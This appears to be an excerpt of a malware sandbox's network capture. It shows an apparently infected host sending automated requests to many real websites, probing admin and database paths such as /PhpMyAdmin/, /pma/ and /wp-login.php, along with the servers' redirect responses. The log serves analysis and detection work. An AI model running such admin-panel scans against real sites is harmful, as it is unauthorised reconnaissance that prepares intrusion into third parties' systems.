Feb 21, 2024 00:26:19.022559881 CET	421	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:18 GMT Server: Apache Location: https://popular.de/admin Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 70 75 6c 61 72 2e 64 65 2f 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://popular.de/admin">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
475	192.168.2.6	53463	81.169.145.86	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.857907057 CET	177	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:19.035967112 CET	459	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:18 GMT Server: Apache/2.4.58 (Unix) Location: https://ksv-schwimmen.de/PhpMyAdmin/ Content-Length: 244 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 73 76 2d 73 63 68 77 69 6d 6d 65 6e 2e 64 65 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://ksv-schwimmen.de/PhpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
476	192.168.2.6	53657	75.2.70.75	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.910073042 CET	165	OUT	GET /pma/ HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:19.005996943 CET	342	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://eyegage.com/pma Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>
Feb 21, 2024 00:26:19.211710930 CET	342	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:18 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://eyegage.com/pma Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
477	192.168.2.6	53658	217.26.61.200	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:18.999068022 CET	163	OUT	GET /pma/ HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:19.184493065 CET	417	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:19 GMT Server: Apache Location: https://eskimo.ch/pma/ Content-Length: 230 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 73 6b 69 6d 6f 2e 63 68 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://eskimo.ch/pma/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
478	192.168.2.6	53667	217.160.0.179	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:19.004797935 CET	171	OUT	GET /wp-login.php HTTP/1.1 Host: upblue.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:19.399077892 CET	568	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:19 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 91 4f 4f 84 30 10 c5 ef 26 7e 87 b1 89 47 18 c8 7a 30 4a 39 b8 7f a2 c9 aa 1b c3 46 3d b2 30 bb 10 81 d6 52 64 d7 4f 6f db 65 23 17 13 b9 b4 4c de cc fc de 6b 74 31 7b 9e 26 ef ab 39 14 ba ae 60 b5 be 5b 3e 4c 81 79 88 af 93 29 e2 2c 99 c1 db 7d f2 b8 84 d0 0f 60 a1 d2 9a 5a d2 88 f3 27 06 ac d0 5a de 20 f6 7d ef f7 13 5f a8 1d 26 2f b8 b7 73 42 db 38 5c bd ed d0 e5 e7 3a 67 f1 f9 59 64 15 ee a4 34 b7 a7 2e 75 45 71 27 61 53 75 14 e1 f1 d7 d4 6b d2 29 34 66 25 67 1f 74 e8 85 ca 5b 06 99 68 34 35 9a 33 06 68 9b 47 a2 9c da 4c 95 52 97 a2 f9 43 67 89 3d fa ec ca 2f ce 86 41 9e 3e 48 1a c9 35 ed 35 5a c2 5b c8 8a 54 19 b7 7c 9d 2c bc eb 61 1d 16 03 f4 c9 15 28 d1 b7 9c 85 41 70 e9 cc b9 3a b4 2a e3 2e 9f d6 04 d4 49 6b cc bf aa ca 3a f5 73 32 89 49 af 12 bb b2 f1 65 21 19 38 bf 9c 0d fe 19 b8 09 1b e3 96 14 67 01 83 46 28 6a cb 6f 93 c2 e9 c6 9c f3 46 1c 19 6c 0a 1b 91 1f 5c a4 e1 6f 8e 45 68 2b 32 8e 52 28 14 6d ff cb 13 0f cf 3a 50 1b de 31 6e 84 69 0c f6 8b 50 da f1 78 da 8c 63 1c 3c a5 e3 24 ee bd 7f 00 9a 54 55 82 69 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 167OO0&~Gz0J9F=0RdOoe#Lkt1{&9`[>Ly),}`Z'Z }_&/sB8\:gYd4.uEq'aSuk)4f%gt[h453hGLRCg=/A>H55Z[T\|,a(Ap:*.Ik:s2Ie!8gF(joFl\oEh+2R(m:P1niPxc<$TUi0
Feb 21, 2024 00:26:19.399689913 CET	208	OUT	GET /wp-admin/ HTTP/1.1 Host: upblue.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://upblue.de/wp-login.php
Feb 21, 2024 00:26:20.636400938 CET	565	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:20 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 36 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 91 4f 4f 84 30 10 c5 ef 26 7e 87 b1 89 47 18 c8 7a 30 4a 39 b8 7f a2 c9 aa 1b c3 46 3d 76 69 57 88 40 6b 29 b2 eb a7 b7 ed 82 ee c5 44 2e 2d 93 37 33 bf f7 9a 9c cd 1e a7 d9 eb 6a 0e 85 a9 2b 58 ad 6f 96 77 53 20 01 e2 f3 64 8a 38 cb 66 f0 72 9b dd 2f 21 0e 23 58 68 56 8b 56 18 c4 f9 03 01 52 18 a3 ae 10 fb be 0f fb 49 28 f5 1b 66 4f b8 73 73 62 d7 38 5c 83 ed d0 15 72 c3 49 7a 7a 92 38 85 3f 05 e3 ee 34 a5 a9 44 da 29 d8 54 9d 48 f0 f0 6b eb b5 30 0c 1a bb 92 92 77 b1 ef a5 e6 2d 81 5c 36 46 34 86 12 02 e8 9a 8f 44 5c b4 b9 2e 95 29 65 f3 87 ce 11 07 e2 a3 2b 3f 29 19 06 05 66 af c4 91 dc 88 9d 41 47 78 0d 79 c1 b4 75 4b d7 d9 22 b8 1c d6 61 31 40 8f ae 40 cb be a5 24 8e a2 73 6f ce d7 a1 d5 39 f5 f9 b4 36 a0 4e 39 63 e1 45 55 d6 2c e4 c2 26 a6 02 c6 eb b2 41 02 de 2c 25 83 79 02 be 7d 63 ad 0a 4d 49 44 a0 91 5a b4 e5 97 8d 60 bc 11 6f bb 91 07 00 17 c1 46 f2 bd cf 33 fe 0d b1 88 5d 45 a5 09 83 42 8b ed bf 60 d2 e1 41 07 5e 4b fa 03 9a 20 4b c1 7d 09 2a 37 18 c7 9d 78 0c 82 63 28 5e e2 9f f9 1b 59 c6 7b 60 60 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 164OO0&~Gz0J9F=viW@k)D.-73j+XowS d8fr/!#XhVVRI(fOssb8\rIzz8?4D)THk0w-\6F4D\.)e+?)fAGxyuK"a1@@$so96N9cEU,&A,%y}cMIDZ`oF3]EB`A^K K}*7xc(^Y{``0

Session ID	Source IP	Source Port	Destination IP	Destination Port
479	192.168.2.6	53907	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:19.010567904 CET	167	OUT	GET /admin/ HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:19.106535912 CET	217	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:19 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://cfgteam.com/admin/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:19.310959101 CET	217	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:19 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://cfgteam.com/admin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
480	192.168.2.6	53798	188.40.92.90	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:19.048048019 CET	162	OUT	GET /admin HTTP/1.1 Host: joaz.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:19.224260092 CET	139	IN	HTTP/1.1 302 Found Location: https://www.domainmarkt.de/joaz.de Server: Caddy Date: Tue, 20 Feb 2024 23:26:19 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
481	192.168.2.6	54060	31.193.11.2	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:19.154217005 CET	179	OUT	GET / HTTP/1.1 Host: www.caspianseagulltravels.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:19.316111088 CET	449	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:19 GMT Server: Apache Location: https://www.caspianseagulltravels.com/ Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 73 70 69 61 6e 73 65 61 67 75 6c 6c 74 72 61 76 65 6c 73 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.caspianseagulltravels.com/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
482	192.168.2.6	54671	13.248.243.5	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:19.265456915 CET	178	OUT	GET /admin/ HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:19.376343966 CET	314	IN	HTTP/1.1 301 Moved Permanently location: https://strategicimpact.com.au/admin/ vary: Accept-Encoding server: DPS/2.0.0+sha-c81b86d x-version: c81b86d x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Tue, 20 Feb 2024 23:26:19 GMT keep-alive: timeout=5 transfer-encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Feb 21, 2024 00:26:19.582606077 CET	314	IN	HTTP/1.1 301 Moved Permanently location: https://strategicimpact.com.au/admin/ vary: Accept-Encoding server: DPS/2.0.0+sha-c81b86d x-version: c81b86d x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Tue, 20 Feb 2024 23:26:19 GMT keep-alive: timeout=5 transfer-encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
483	192.168.2.6	54467	15.161.71.77	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:19.317459106 CET	179	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: iisalessandrini.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:19.499093056 CET	675	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:19 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: same-origin Location: https://iisalessandrini.edu.it/PhpMyAdmin/ Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 69 73 61 6c 65 73 73 61 6e 64 72 69 6e 69 2e 65 64 75 2e 69 74 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://iisalessandrini.edu.it/PhpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
484	192.168.2.6	55315	213.186.33.5	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:19.570764065 CET	170	OUT	GET /admin HTTP/1.1 Host: pharmacie-vp.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:19.736705065 CET	458	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Tue, 20 Feb 2024 23:26:19 GMT content-type: text/html content-length: 138 location: http://imp.ovh.net x-iplb-request-id: BF60E3DE:D813_D5BA2105:0050_65D5351B_8655A13:3720 x-iplb-instance: 52243 set-cookie: SERVERID77446=200178\|ZdU1H\|ZdU1H; path=/; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
485	192.168.2.6	55872	23.236.62.147	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:19.867398977 CET	168	OUT	GET /admin/ HTTP/1.1 Host: gmcocorp.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:20.078505039 CET	536	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:19 GMT Content-Length: 0 Connection: keep-alive location: https://www.gmcocorp.com/admin strict-transport-security: max-age=3600 x-wix-request-id: 1708471579.9587358343771484 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=uw2-pub-1 X-Seen-By: 9WD8GAcpJgs/Ng1WkD2i0h9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLoEHOoo/2p1KdeeIJMpyT5AG/hKs8AeY1T4OIbgnD+yx,2d58ifebGbosy5xc+FRalmLbTGKkgDPEA279SoowgAKh5557RZOjaCnj+yNlV+iCIAcZml9UzrsbarQau1wF2Q==,2UNV7 Data Raw: Data Ascii:
Feb 21, 2024 00:26:20.078520060 CET	254	IN	Data Raw: 4f 71 34 6f 47 6a 41 35 2b 50 4b 73 58 34 37 49 4e 42 2f 62 41 6f 6a 66 48 6a 41 42 32 6a 45 4f 77 33 47 6a 6b 52 32 72 78 43 54 67 61 4a 37 2f 4b 32 4b 78 39 6a 68 41 66 43 2c 52 38 6e 56 77 50 4a 76 39 51 4a 4c 31 6d 37 38 4f 52 4f 4f 2b 43 4c Data Ascii: Oq4oGjA5+PKsX47INB/bAojfHjAB2jEOw3GjkR2rxCTgaJ7/K2Kx9jhAfC,R8nVwPJv9QJL1m78OROO+CLIiD8kgg4qaApVirf92SI=,9n3wTMzaU7zAZzBAj7gVU6xSZPO2Wi7vAR2fn+koidj4D2PFRhC5HA4zrltzn4LTGcW4x/oCCqPVo9d7do6Uvg==Cache-Control: no-cacheX-Content-Type-Options:

Session ID	Source IP	Source Port	Destination IP	Destination Port
486	192.168.2.6	56241	193.70.18.144	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:19.960994005 CET	161	OUT	GET / HTTP/1.1 Host: imp.ovh.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:20.123958111 CET	92	IN	HTTP/1.1 301 Moved Permanently content-length: 0 location: https://www.ovh.co.uk/mail/

Session ID	Source IP	Source Port	Destination IP	Destination Port
487	192.168.2.6	56305	144.91.85.110	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:20.000324011 CET	166	OUT	GET /admin/ HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:20.181087971 CET	528	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:20 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://m-viper.de/admin/ X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Permitted-Cross-Domain-Policies: master-only Referrer-Policy: same-origin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
488	192.168.2.6	56108	223.29.45.22	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:20.020303011 CET	182	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: shinko-kensetsu.co.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:20.293171883 CET	463	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:20 GMT Server: Apache Location: http://www.shinko-kensetsu.eei.jp/PhpMyAdmin/ Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 68 69 6e 6b 6f 2d 6b 65 6e 73 65 74 73 75 2e 65 65 69 2e 6a 70 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.shinko-kensetsu.eei.jp/PhpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
489	192.168.2.6	56569	3.33.139.32	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:20.031311989 CET	174	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: protonmail.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
